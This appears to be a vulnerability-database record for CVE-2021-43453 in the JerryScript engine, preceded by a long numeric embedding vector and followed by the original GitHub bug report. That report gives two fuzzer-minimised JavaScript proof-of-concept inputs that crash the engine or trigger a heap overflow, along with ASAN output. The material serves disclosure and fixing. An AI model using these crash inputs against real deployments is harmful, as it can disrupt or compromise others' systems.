-0.008594615384936333, 0.01466552633792162, 0.010718733072280884, 0.016404079273343086, -0.020526129752397537, 0.009344716556370258, 0.003561227349564433, -0.0018279331270605326, 0.0030249401461333036, 0.010143889114260674, -0.014847793616354465, -0.002152159111574292, -0.007753380574285984, -0.008818944916129112, 0.0191661324352026, -0.008994202129542828, -0.020960766822099686, 0.0031721561681479216, -0.02487250789999962, -0.029387135058641434, 0.007269670721143484, -0.010192961432039738, 0.014875834807753563, -0.003135352162644267, 0.033761557191610336, 0.01665644906461239, 0.0001892778236651793, -0.000019921819330193102, -0.009372757747769356, -0.0004574214108288288, -0.007479979190975428, -0.01780613698065281, 0.008594615384936333, 0.02227870188653469, 0.018787577748298645, 0.008096884936094284, 0.01108326856046915, 0.007921627722680569, 0.02192818745970726, -0.003333392785862088, -0.02649889513850212, 0.002660405123606324, -0.000032888117857510224, -0.005972766783088446, 0.003135352162644267, -0.016053562983870506, 0.010094817727804184, 0.010101827792823315, -0.01277975831180811, -0.001330202561803162, -0.009842447005212307, 0.012471306137740612, -0.014945938251912594, 0.00459875026717782, 0.005096480716019869, 0.010858939029276371, -0.0009236056939698756, -0.004072978626936674, -0.008832965046167374, -0.008061833679676056, -0.0018384485738351941, 0.016950881108641624, -0.0074449279345571995, -0.02635869011282921, 0.0070348260924220085, 0.028616003692150116, -0.012422233819961548, 0.011174402199685574, -0.002709476975724101, 0.0038626696914434433, -0.006726372987031937, 0.007655236404389143, 0.011833369731903076, 0.0066177137196063995, -0.006919156294316053, 0.0029600949492305517, -0.006750909145921469, 0.014567382633686066, -0.024507973343133926, -0.016390057280659676, -0.0102700749412179, 0.0006296116625890136, -0.03664979711174965, 0.009681209921836853, -0.011167392134666443, -0.00816698744893074, 0.003834628500044346, -0.003424526657909155, 0.0018156650476157665, -0.022909628227353096, -0.03126589208841324, 0.014651506207883358, -0.0008951263735070825, 0.00994059070944786, -0.004030916839838028, 0.005408438853919506, -0.003666381584480405, 0.018647370859980583, 0.014875834807753563, 0.004483080469071865, -0.011006155051290989, 0.010753784328699112, 0.00745193799957633, -0.023091895505785942, -0.0013880373444408178, -0.025152919813990593, 0.011153371073305607, 0.0019611285533756018, -0.01633397489786148, -0.029078682884573936, 0.025755805894732475, 0.02204035222530365, 0.003725968999788165, 0.0071995677426457405, 0.005615242291241884, 0.008405338041484356, -0.01951664686203003, 0.006063900887966156, -0.004560193512588739, 0.00015400729898829013, -0.019614791497588158, -0.00553812924772501, -0.018002424389123917, -0.00799874123185873, 0.005895653739571571, -0.020722417160868645, -0.0023326738737523556, 0.00015258333587553352, -0.019348399713635445, -0.02044200524687767, -0.037154536694288254, -0.009632138535380363, 0.01444119680672884, -0.017764074727892876, -0.019376441836357117, 0.00947090145200491, -0.005513593088835478, 0.014385114423930645, 0.018451083451509476, 0.019923243671655655, -0.008202039636671543, -0.036032889038324356, -0.00947791151702404, 0.024115396663546562, 0.007872555404901505, -0.0207925196737051, 0.006284724920988083, 0.04279080778360367, -0.0062742093577980995, -0.0016982427332550287, -0.012352130375802517, -0.024746323004364967, -0.01181233860552311, 0.007970700040459633, 0.023891067132353783, 0.001072574406862259, -0.01838098093867302, 0.0047494713217020035, -0.027227966114878654, 0.001971644116565585, 0.01262553222477436, -0.006533590145409107, -0.0034490625839680433, 0.005096480716019869, 0.006628229282796383, 0.012204914353787899, 0.007711318787187338, 0.03404196724295616, -0.03457475081086159, -0.0013223158894106746, -0.015899337828159332, -0.0006935805431567132, -0.0006786836893297732, 0.0007833999115973711, -0.008868016302585602, 0.005362871568650007, -0.018338918685913086, -0.015843255445361137, -0.022208597511053085, -0.010024714283645153, 0.011223474517464638, 0.02352653257548809, -0.0119245033711195, -0.009989663027226925, 0.004483080469071865, 0.006803486496210098, 0.02032984048128128, 0.011952544562518597, 0.018885720521211624, 0.005779983941465616, -0.009870488196611404, 0.012933985330164433, -0.00919049046933651, 0.014413155615329742, -0.010830897837877274, 0.0024974157568067312, 0.023708799853920937, -0.006358332931995392, 0.007599154021590948, 0.03311660885810852, -0.028489818796515465, -0.010837907902896404, 0.008223069831728935, 0.00189102569129318, 0.02558755874633789, 0.022068392485380173, -0.003743494860827923, 0.018675412982702255, 0.013887383975088596, -0.01596944034099579, -0.002981125842779875, -0.031237851828336716, 0.008720800280570984, -0.003655866254121065, 0.03182671591639519, -0.005170088727027178, -0.015030061826109886, -0.00702080549672246, 0.004441018681973219, -0.0057904995046556, -0.018423041328787804, -0.011279556900262833, 0.00016616577340755612, 0.010879970155656338, 0.007837504148483276, -0.007346783764660358, 0.010459352284669876, -0.015338514000177383, 0.015703048557043076, -0.002893497236073017, 0.0037154536694288254, 0.00745193799957633, -0.009569046087563038, -0.005110501311719418, 0.0021328807342797518, 0.014833773486316204, -0.013417694717645645, -0.0039958651177585125, -0.0014432434691116214, -0.0026078277733176947, 0.003233496332541108, 0.010171930305659771, -0.024409828707575798, -0.00477050244808197, 0.011917492374777794, -0.010704712942242622, -0.01038924977183342, -0.0019138091010972857, -0.014237898401916027, -0.015254390425980091, -0.002227519638836384, 0.007339773699641228, -0.01965685375034809, -0.014230888336896896, -0.024858487769961357, 0.006056890357285738, 0.013845322653651237, -0.0048230793327093124, -0.0177921149879694, -0.025896010920405388, 0.0033439083490520716, 0.015142226591706276, -0.01906798779964447, -0.01861933059990406, -0.003764525754377246, 0.018563248217105865, 0.005685345269739628, -0.0022590658627450466, 0.011756256222724915, -0.012716665863990784, -0.0020925714634358883, -0.005927199963480234, 0.015212329104542732, -0.027101781219244003, 0.002183705335482955, -0.05024975910782814, -0.031462181359529495, 0.006137508898973465, -0.01838098093867302, 0.00018204846128355712, -0.005622252356261015, 0.009505952708423138, 0.021773960441350937, 0.01381027139723301, -0.009954611770808697, -0.004735450726002455, -0.003687412478029728, 0.013873363845050335, 0.005208645481616259, 0.012106770649552345, 0.009281624108552933, 0.006053385324776173, -0.03286423906683922, 0.01676861383020878, -0.01793232187628746, -0.012120790779590607, 0.0023572100326418877, -0.016698511317372322, -0.026344669982790947, 0.007178537081927061, 0.022993750870227814, 0.009975642897188663, -0.009793374687433243, 0.032387539744377136, 0.0212271586060524, -0.01473562978208065, -0.005397923290729523, -0.00021019915584474802, -0.019488606601953506, -0.018997885286808014, 0.0027147347573190928, -0.010774815455079079, 0.0007890957640483975, -0.009968631900846958, 0.011069247499108315, -0.00788657646626234, -0.016516242176294327, -0.024129418656229973, -0.01473562978208065, -0.014595423825085163, -0.008475440554320812, 0.008138946257531643, -0.015324493870139122, 0.016740571707487106, 0.00043069469393230975, 0.017553765326738358, 0.003350918646901846, 0.009015233255922794, -0.0022503030486404896, -0.009828426875174046, 0.019614791497588158, 0.019670873880386353, 0.013606972992420197, 0.012232955545186996, -0.012723675929009914, 0.010424301028251648, 0.004556688480079174, -0.007606164552271366, 0.01444119680672884, 0.007055856753140688, 0.00947791151702404, -0.002904012566432357, 0.00815997738391161, 0.02111499384045601, 0.007963689044117928, -0.03491124510765076, 0.000913090247195214, 0.0041746278293430805, 0.0023011276498436928, 0.004816069267690182, -0.008412348106503487, 0.007907606661319733, -0.0006620342610403895, -0.004115039948374033, -0.038304224610328674, 0.00011764142982428893, 0.016950881108641624, 0.00872781127691269, -0.0038451440632343292, 0.003838133765384555, 0.018563248217105865, -0.03095743991434574, -0.0030249401461333036, 0.010837907902896404, 0.0022713339421898127, -0.012632542289793491, 0.0006927042850293219, -0.00970224104821682, -0.00394328823313117, -0.02512487955391407, -0.007024310529232025, 0.004146586637943983, 0.014945938251912594, -0.015044081956148148, -0.003803082276135683, 0.019670873880386353, -0.004377926234155893, 0.024045294150710106, -0.004626791458576918, 0.014539341442286968, -0.0241013765335083, 0.010298116132616997, 0.01050842460244894, -0.008251111023128033, -0.005376892164349556, 0.002618343336507678, -0.0300320815294981, -0.01170017383992672, -0.011006155051290989, -0.01301810797303915, 0.002828652039170265, 0.004164112266153097, -0.004893182311207056, -0.009379767812788486, -0.007837504148483276, 0.015380576252937317, 0.007718329317867756, -0.0011330380802974105, 0.015422637574374676, -0.008258121088147163, 0.008699770085513592, 0.0016036038286983967, -0.017147168517112732, -0.015675008296966553, 0.003031950443983078, -0.005643283482640982, -0.014357074163854122, 0.0027883427683264017, -0.018633350729942322, -0.0043323589488863945, -0.012134811840951443, -0.03095743991434574, 0.033088568598032, -0.0037364845629781485, -0.023554574698209763, 0.0033544236794114113, -0.010494403541088104, -0.006673796102404594, -0.005499572493135929, 0.0010121106170117855, 0.01770799234509468, 0.002818136475980282, -0.041753288358449936, 0.03348114341497421, 0.006053385324776173, -0.00970224104821682, -0.005478541366755962, 0.01455336157232523, -0.004405967425554991, -0.0038451440632343292, -0.0037890616804361343, 0.009274613112211227, -0.0027077244594693184, -0.01871747337281704, -0.003739989595487714, 0.017525725066661835, -0.015492741018533707, -0.014833773486316204, -0.004549677949398756, 0.014707588590681553, -0.027704665437340736, 0.009456881321966648, -0.01427996065467596, -0.029050640761852264, -0.006039364729076624, -0.014315011911094189, -0.03412609174847603, -0.01479171123355627, 0.008244100958108902, 0.00702080549672246, -0.017946342006325722, 0.024704260751605034, 0.008482450619339943, 0.012688624672591686, -0.010059766471385956, -0.016740571707487106, -0.005727407056838274, -0.043912455439567566, -0.009800385683774948, 0.013053160160779953, 0.008138946257531643, -0.0074449279345571995, -0.00001585530480952002, 0.0028619507793337107, -0.011279556900262833, 0.00942183006554842, 0.015787173062562943, 0.002963599981740117, 0.016936860978603363, -0.015703048557043076, -0.002821641741320491, 0.0012504605110734701, -0.010235023684799671, 0.007073382381349802, -0.015310472808778286, 0.007017299998551607, 0.006757919676601887, 0.0013722642324864864, -0.006067405920475721, -0.003179166465997696, -0.012548418715596199, 0.0018577268347144127, 0.010557496920228004, 0.0060919420793652534, -0.0075360615737736225, 0.000333865056745708, 0.01455336157232523, 0.009337706491351128, -0.018072526901960373, 0.009351726621389389, -0.000675178540404886, 0.0067894659005105495, -0.002390508772805333, 0.013424704782664776, -0.004532152321189642, -0.013768209144473076, -0.007515030913054943, 0.0009201005450449884, 0.003855659393593669, 0.0041676172986626625, 0.03320073336362839, 0.012429243884980679, 0.008195028640329838, -0.019951285794377327, -0.0004894058802165091, -0.019670873880386353, 0.012688624672591686, -0.0026639101561158895, 0.010571517050266266, 0.011524916626513004, 0.00021173266577534378, 0.007711318787187338, -0.004591739736497402, 0.002257313346490264, -0.01113233994692564, 0.013340582139790058, -0.009036263450980186, 0.0053558615036308765, 0.0023624675814062357, -0.007704308722168207, 0.006898125167936087, 0.01690881885588169, 0.02202633023262024, -0.01689479872584343, -0.006049880292266607, -0.010830897837877274, 0.01284986175596714, 0.017077066004276276, 0.00527524296194315, -0.005958746187388897, 0.000053535612096311525, 0.015156246721744537, 0.005015862639993429, -0.0018366959411650896, -0.007851524278521538, 0.011973574757575989, -0.006105962675064802, -0.0007408999954350293, -0.004605760332196951, -0.003999370615929365, 0.009695230983197689, 0.006316271144896746, 0.021199116483330727, 0.002627106150612235, -0.00872781127691269, -0.004469059873372316, -0.004553183447569609, -0.0021118498407304287, -0.005324315279722214, -0.0007181165856309235, -0.009351726621389389, -0.011770276352763176, 0.02421354129910469, -0.01836695894598961, -0.010865949094295502, 0.006754414178431034, -0.016922838985919952, -0.0172312930226326, 0.00278308498673141, -0.0029688577633351088, -0.018002424389123917, 0.0077884322963654995, -0.0037750410847365856, -0.013452745974063873, 0.004160607233643532, 0.01905396766960621, -0.02797105722129345, 0.00713998032733798, 0.004328853916376829, 0.01836695894598961, 0.0023624675814062357, -0.01216285303235054, 0.021535610780119896, -0.0001406439405400306, 0.030284453183412552, -0.012583469972014427, -0.008363275788724422, 0.0005844829138368368, -0.0010042240610346198, 0.009491932578384876, -0.0032895784825086594, -0.012520377524197102, -0.002148653846234083, 0.020021388307213783, 0.008643687702715397, 0.009372757747769356, 0.013221406377851963, -0.012541408650577068, 0.008671728894114494, 0.02044200524687767, -0.006410910282284021, 0.0050018420442938805, -0.009898529388010502, -0.00236947787925601, -0.004405967425554991, 0.016810676082968712, -0.03914545848965645, 0.023947149515151978, -0.006260188762098551, -0.0037224639672785997, 0.01767995022237301, 0.003485866589471698, 0.009723272174596786, 0.006239158101379871, -0.007168021518737078, -0.010213992558419704, 0.009239561855793, -0.005688850302249193, -0.006982248742133379, -0.02569972351193428, 0.0003165584057569504, -0.005482046864926815, -0.008447399362921715, 0.0012671098811551929, 0.0161096453666687, 0.016390057280659676, -0.025194982066750526, 0.009162449277937412, 0.02376488223671913, -0.0333409383893013, -0.013172334991395473, -0.028223427012562752, 0.0027112297248095274, 0.006330291740596294, 0.0014371094293892384, 0.02626054547727108, 0.00650554895401001, -0.0241013765335083, 0.014581402763724327, 0.015717070549726486, -0.0041676172986626625, -0.006698331795632839, -0.0021030870266258717, 0.010837907902896404, -0.009330695495009422, -0.011020176112651825, -0.01347377710044384, -0.026302607730031013, -0.0014485011342912912, 0.0028111261781305075, 0.024059314280748367, 0.018240774050354958, 0.011805328540503979, 0.01324243750423193, -0.035219695419073105, -0.005716891493648291, -0.031209811568260193, -0.006558126304298639, 0.0061830757185816765, 0.005282253492623568, -0.01416779588907957, 0.01238718256354332, -0.012709655798971653, 0.025769826024770737, 0.006039364729076624, -0.0075430721044540405, 0.003487619338557124, 0.005173593759536743, 0.003803082276135683, 0.02090468443930149, -0.0017648404464125633, -0.003031950443983078, 0.013768209144473076, -0.01836695894598961, -0.008237090893089771, 0.019208194687962532, -0.008482450619339943, 0.011307597160339355, -0.000032285672205034643, -0.024718282744288445, 0.005443490110337734, -0.003785556647926569, -0.02626054547727108, -0.015927378088235855, -0.010683681815862656, -0.01050141453742981, -0.006901630200445652, 0.02282550372183323, 0.01084491889923811, -0.03620113804936409, 0.010606568306684494, -0.00002694580143725034, 0.00982141587883234, 0.006607198156416416, -0.025966113433241844, 0.005443490110337734, -0.013319551013410091, -0.019825099036097527, -0.0018612319836392999, -0.005916684865951538, 0.0055100880563259125, 0.010361208580434322, 0.010066776536405087, 0.024003231897950172, -0.024732302874326706, -0.021058911457657814, 0.029863834381103516, -0.0014371094293892384, -0.010823887772858143, 0.016978921368718147, -0.02191416546702385, 0.005334830842912197, 0.002101334510371089, 0.024339726194739342, 0.012513367459177971, 0.013691096566617489, 0.00850348174571991, 0.0008811058360151947, 0.000230463279876858, 0.007241629529744387, 0.005885138176381588, -0.012225945480167866, 0.006775445304811001, -0.004377926234155893, 0.0031073109712451696, -0.015114185400307178, -0.0017350467387586832, 0.026316627860069275, -0.002115354873239994, -0.010438322089612484, -0.01767995022237301, 0.013116252608597279, 0.007802452892065048, 0.017147168517112732, 0.01908200979232788, 0.00479153310880065, -0.015618925914168358, -0.004879161715507507, -0.007942658849060535, -0.011202443391084671, -0.004469059873372316, -0.0008854872430674732, 0.0207925196737051, -0.012092750519514084, -0.03106960467994213, 0.009611107409000397, 0.007655236404389143, 0.0007141733076423407, -0.005590706132352352, 0.02136736363172531, 0.006873589474707842, -0.0009174717124551535, 0.006042869761586189, -0.035556189715862274, -0.0004239034606143832, -0.03869679942727089, 0.0036628765519708395, -0.022559113800525665, -0.011552957817912102, 0.013508828356862068, 0.014945938251912594, 0.02991991676390171, 0.017441600561141968, 0.018563248217105865, 0.007136475294828415, 0.01599748246371746, 0.024493953213095665, 0.0037189587019383907, 0.015801193192601204, -0.001182110165245831, -0.008019771426916122, 0.0034350419882684946, 0.0016237583477050066, 0.022517051547765732, 0.011370690539479256, 0.012352130375802517, -0.014469237998127937, -0.012765738181769848, 0.01633397489786148, 0.001725407550111413, 0.007592143956571817, 0.0014695320278406143, 0.005352356471121311, -0.025082817301154137, 0.00970224104821682, 0.020161593332886696, -0.03782752528786659, -0.02274138107895851, -0.002139891032129526, -0.01277975831180811, 0.009414819069206715, -0.02194220758974552, 0.004360400140285492, -0.0011479349341243505, 0.007578123360872269, 0.00698925880715251, -0.005608231760561466, 0.006302250549197197, -0.012120790779590607, 0.010452342219650745, 0.00430782325565815, -0.02181602269411087, 0.00799874123185873, -0.013852332718670368, 0.00896616093814373, 0.0071925572119653225, 0.003761020489037037, -0.002257313346490264, -0.008244100958108902, 0.004041431937366724, 0.01986716128885746, 0.0003502954205032438, 0.000052522405894706026, -0.013263468630611897, 0.0005209521623328328, -0.0006523951306007802, 0.003799577010795474, -0.010992134921252728, 0.030284453183412552, 0.007493999786674976, 0.00009951325773727149, 0.005646788515150547, -0.02662508189678192, -0.017091086134314537, 0.016179749742150307, 0.0011391721200197935, 0.007809462957084179, 0.014539341442286968, 0.013487798161804676, -0.01462346501648426, 0.007325753103941679, 0.014195837080478668, 0.023260142654180527, -0.00309679564088583, -0.010669661685824394, -0.005986787378787994, 0.021030869334936142, 0.006898125167936087, 0.0014020579401403666, 0.001980406930670142, -0.009695230983197689, 0.016754593700170517, 0.005653798580169678, -0.002812878927215934, -0.0011891204630956054, 0.0025797865819185972, -0.00023484471603296697, -0.002209993777796626, 0.025783846154808998, -0.0014739134348928928, -0.006053385324776173, -0.023834984749555588, -0.011433782987296581, 0.003834628500044346, 0.001873499946668744, -0.0010129868751391768, -0.002180200070142746, -0.005923694930970669, -0.011006155051290989, 0.0014660268789157271, -0.03838834911584854, 0.009029253385961056, -0.006509053986519575, 0.020610252395272255, 0.0076271952129900455, 0.03948195278644562, -0.0005989416386000812, 0.008692759089171886, 0.008748841471970081, -0.021507568657398224, -0.00862265657633543, 0.00014360141358338296, 0.013088211417198181, -0.013635014183819294, -0.008033792488276958, 0.0016439129831269383, -0.0008359770872630179, -0.018801597878336906, -0.027592500671744347, -0.009604097343981266, -0.00006906230555614457, 0.011756256222724915, 0.022418906912207603, -0.02100282907485962, 0.019586749374866486, 0.031237851828336716, 0.006368848495185375, 0.006778950337320566, 0.005681839771568775, 0.004044937435537577, -0.00008319242624565959, 0.004707409534603357, -0.01473562978208065, -0.007578123360872269, 0.01038924977183342, 0.005916684865951538, 0.009407809004187584, -0.0006887610070407391, 0.006242663133889437, -0.00959007628262043, -0.004819574300199747, -0.007493999786674976, -0.01444119680672884, 0.02250303141772747, -0.018675412982702255, -0.013396663591265678, -0.0061340038664639, -0.013747178949415684, -0.0172312930226326, 0.00768327759578824, 0.0035226705949753523, 0.01804448664188385, -0.004213184118270874, 0.017974384129047394, -0.0000823161390144378, 0.00954100489616394, 0.0019541182555258274, 0.020722417160868645, 0.007620185147970915, 0.0038100925739854574, 0.009961621835827827, 0.006659775506705046, 0.023105915635824203, -0.004335864447057247, 0.011272545903921127, -0.029190847650170326, 0.000722497992683202, -0.0031213315669447184, -0.0044305031187832355, 0.005853591952472925, 0.002446591155603528, -0.018703453242778778, -0.0031949395779520273, -0.030060123652219772, 0.0005884261918254197, 0.023933129385113716, 0.0020908189471811056, -0.010957082733511925, -0.0053488509729504585, 0.012464295141398907, 0.021521590650081635, 0.0016474181320518255, -0.005047408863902092, -0.004802048671990633, 0.011538936756551266, -0.0028672085609287024, -0.007620185147970915, 0.021381383761763573, -0.0016404078342020512, 0.004398956894874573, -0.0003465712070465088, 0.0036804021801799536, 0.004844110459089279, 0.020371902734041214, 0.0015887069748714566, -0.002330921357497573, 0.04189349338412285, -0.006214621942490339, -0.008755852468311787, 0.008440389297902584, -0.013635014183819294, 0.013712126761674881, -0.013487798161804676, 0.01135666947811842, 0.0007982967654243112, 0.0012776253279298544, -0.0377153605222702, 0.00019749300554394722, 0.009632138535380363, -0.005997302941977978, -0.012793779373168945, 0.03154630586504936, 0.00008467115549137816, -0.010473373346030712, 0.0016710777999833226, -0.0014502537669613957, -0.0006458229618147016, 0.008026781491935253, -0.01882963813841343, 0.003708443371579051, -0.02170385792851448, -0.010368218645453453, 0.003040713258087635, -0.016179749742150307, -0.009688220918178558, -0.010361208580434322, -0.011412751860916615, -0.0031546305399388075, -0.020582210272550583, 0.015506761148571968, 0.01535253506153822, 0.037743400782346725, 0.007157505955547094, 0.014188827015459538, 0.0062812198884785175, -0.009316675364971161, -0.03233145549893379, -0.020932726562023163, 0.020161593332886696, -0.006901630200445652, 0.0004981687525287271, -0.013845322653651237, -0.002774322172626853, -0.004949264694005251, -0.000055945398344192654, -0.013950477354228497, 0.010487393476068974, 0.000762369018048048, 0.02111499384045601, 0.013445735909044743, 0.014027589932084084, -0.0019453554414212704, -0.012716665863990784, -0.019670873880386353, -0.01101316511631012, -0.014336043037474155, -0.007206577807664871, 0.0016211295733228326, 0.0016482943901792169, 0.0019523657392710447, 0.013410684652626514, 0.00767626753076911, 0.03348114341497421, 0.011293577030301094, -0.008026781491935253, -0.012870891951024532, -0.01563294604420662, 0.00977234449237585, -0.01882963813841343, 0.0020925714634358883, -0.0006037612329237163, 0.0048300898633897305, -0.041276585310697556, -0.0013801507884636521, -0.011342649348080158, -0.0006252302555367351, -0.019208194687962532, 0.0006488899816758931, 0.008825954981148243, -0.019124070182442665, 0.010683681815862656, 0.011174402199685574, 0.01700696349143982, 0.0029828783590346575, 0.003918752074241638, 0.0012206666870042682, 0.005818540696054697, 0.005993797909468412, 0.011531926691532135, 0.008061833679676056, 0.010837907902896404, -0.011602030135691166, -0.005555654875934124, 0.0027620543260127306, -0.012814809568226337, -0.024830447509884834, 0.0019611285533756018, -0.03151826187968254, 0.008349255658686161, 0.0008697140729054809, 0.02227870188653469, -0.006845548283308744, 0.013515839353203773, -0.007164516486227512, -0.011461824178695679, -0.0007952297455631196, 0.008110905066132545, 0.001344223041087389, 0.007697298191487789, 0.010031725279986858, 0.011006155051290989, 0.002514941617846489, -0.021900145336985588, -0.007360804360359907, 0.048707492649555206, 0.004759986884891987, 0.01689479872584343, 0.004865141119807959, -0.009302654303610325, 0.019783038645982742, -0.003102053189650178, 0.0006716733914799988, -0.01713314838707447, 0.026414772495627403, 0.013431715779006481, 0.002085561165586114, 0.007669257000088692, -0.012940995395183563, -0.01073275413364172, -0.008138946257531643, 0.006211116909980774, 0.0005529366317205131, -0.024606117978692055, -0.01908200979232788, -0.016838716343045235, 0.009183479472994804, 0.019348399713635445, -0.0065195695497095585, 0.0026463845279067755, -0.000986698316410184, 0.0016447892412543297, -0.004384936299175024, 0.016193769872188568, -0.0011120071867480874, 0.017329435795545578, 0.008272142149508, -0.015002020634710789, 0.010950072668492794, 0.008356265723705292, 0.020147573202848434, -0.013375633396208286, 0.010872960090637207, 0.0006160291959531605, 0.0046758633106946945, 0.0033456608653068542, -0.003824113169685006, -0.016460159793496132, 0.007430907338857651, 0.02248900942504406, 0.002372983144596219, 0.0028023633640259504, 0.000409225671319291, -0.009498942643404007, 0.00146252172999084, 0.009597087278962135, -0.0017473147017881274, 0.010263064876198769, 0.009751313365995884, -0.006074415985494852, 0.013992538675665855, 0.0001796386786736548, 0.004009885713458061, -0.010115847922861576, -0.009225541725754738, -0.004227204713970423, -0.014483259059488773, -0.006898125167936087, -0.009968631900846958, -0.02319003827869892, -0.0191661324352026, 0.0046022552996873856, 0.025279104709625244, -0.008019771426916122, 0.022460969164967537, 0.010816877707839012, -0.002975868061184883, -0.010459352284669876, 0.003049476072192192, -0.006070910952985287, -0.03645350784063339, 0.004542667884379625, -0.0010892237769439816, 0.0021679322235286236, -0.02215251699090004, 0.0025867968797683716, -0.000218633416807279, 0.025166939944028854, -0.011686153709888458, -0.018703453242778778, -0.021521590650081635, -0.010354198515415192, 0.0026341164484620094, 0.003168651135638356, 0.029975999146699905, 0.008987192064523697, 0.02180200070142746, -0.01501604076474905, -0.015618925914168358, -0.0026937038637697697, -0.01874551549553871, -0.004907202906906605, 0.004935244098305702, 0.015072123147547245, 0.014174805954098701, 0.007360804360359907, 0.014861814677715302, -0.011735225096344948, 0.015002020634710789, 0.014581402763724327, 0.003161640837788582, -0.011349659413099289, -0.007802452892065048, 0.00027164872153662145, -0.0016614387277513742, 0.024367768317461014, -0.0095830662176013, -0.00548555189743638, 0.014931917190551758, -0.006063900887966156, -0.010950072668492794, -0.00107870833016932, 0.009092345833778381, -0.007325753103941679, 0.01620779000222683, -0.004647822119295597, -0.00030253781005740166, 0.021619733422994614, 0.01826881617307663, 0.003566484898328781, 0.014230888336896896, 0.01451130025088787, 0.01473562978208065, 0.0004105401167180389, 0.01165811251848936, -0.026064258068799973, -0.010978113859891891, 0.017511704936623573, -0.02855992130935192, -0.017315415665507317, 0.0224749892950058, -0.026653122156858444, 0.02969558723270893, 0.01038924977183342, 0.0002477699308656156, 0.022979730740189552, 0.046772655099630356, -0.00799874123185873, -0.0008898686501197517, -0.02204035222530365, 0.031237851828336716, -0.014308001846075058, -0.0007027815445326269, -0.011602030135691166, -0.015114185400307178, 0.015534802339971066, 0.007185547146946192, 0.002795353066176176, -0.005026377737522125, -0.004980810917913914, 0.021086951717734337, 0.03129393234848976, 0.003936277702450752, 0.004980810917913914, 0.012905944138765335, -0.010445332154631615, 0.006649259943515062, 0.01713314838707447, 0.01112532988190651, -0.020301800221204758, 0.004020401276648045, 0.012807799503207207, -0.002234529936686158, 0.004199163522571325, 0.0021083445753902197, -0.011889452114701271, -0.03165847063064575, -0.00229937513358891, 0.0009411314385943115, -0.002476384863257408, -0.0007295082905329764, 0.012141821905970573, -0.01825479418039322, 0.007017299998551607, 0.0071995677426457405, 0.010704712942242622, -0.020918704569339752, 0.010368218645453453, -0.011735225096344948, 0.019222214818000793, 0.0024413333740085363, -0.024185501039028168, -0.023091895505785942, 0.005296274088323116, -0.009611107409000397, -0.012029657140374184, -0.011503885500133038, -0.0001960690424311906, -0.001610614126548171, 0.010676671750843525, -0.008678738959133625, 0.008033792488276958, -0.02236282452940941, 0.03535990044474602, -0.01758180744946003, 0.02464817836880684, -0.02317601814866066, -0.028279509395360947, 0.005163078662008047 ]
CVE-2021-43453
2022-04-07T21:15:07.517000
A Heap-based Buffer Overflow vulnerability exists in JerryScript 2.4.0 and prior versions via an out-of-bounds read in parser_parse_for_statement_start in the js-parser-statm.c file. This issue is similar to CVE-2020-29657.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4754" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CA39B32-B4C8-4430-A138-4C35D325F832", "versionEndExcluding": null, "versionEndIncluding": "2.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4754
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision ```sh $ jerry --version Version: 3.0.0 (5a69b183) ``` ###### Build platform ```sh $ echo "$(lsb_release -ds) ($(uname -mrs))" Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86_64) ``` ###### Build steps ```sh $ python tools/build.py ``` ###### Test case There are two test cases, where `jerry_poc_crash.js` can trigger a direct crash of the clean-built jerry and `jerry_poc_asan.js` can trigger a heap-overflow of the ASAN-enabled-built jerry. This bug is found by a naive fuzzer. And I use `afl-tmin` to reduce the test cases. I sincerely apologize for making them struggling. + jerry_poc_crash.js ```js R=function(){({0:0}) function x(){for(v in 0){function o(){}function x(){for(;;)for(function(){class A extends function(){for(let;;){((function(){}))}0=function(){} class e ``` + jerry_poc_asan.js ```js R = function() { function x(){ function y(){ for(;;) for(function(){ class A extends function() { for(let;;) { ((function(){})) } ``` ###### Execution steps ```sh $ ~/release/jerryscript/build/bin/jerry jerry_poc_crash.js Segmentation fault (core dumped) ``` ```sh $ ~/asan/jerryscript/build/bin/jerry jerry_poc_asan.js ==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010 READ of size 1 at 0x612000005692 thread T0 #0 0x55555566952b (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) #1 0x55555566a84e (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e) #2 0x555555589aa2 (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2) #3 0x55555579d5c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x2495c9) #4 0x5555555dead1 (/home/docker/asan/jerryscript/build/bin/jerry+0x8aad1) #5 0x555555633868 (/home/docker/asan/jerryscript/build/bin/jerry+0xdf868) #6 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #7 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #8 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #9 0x5555555f6d8e 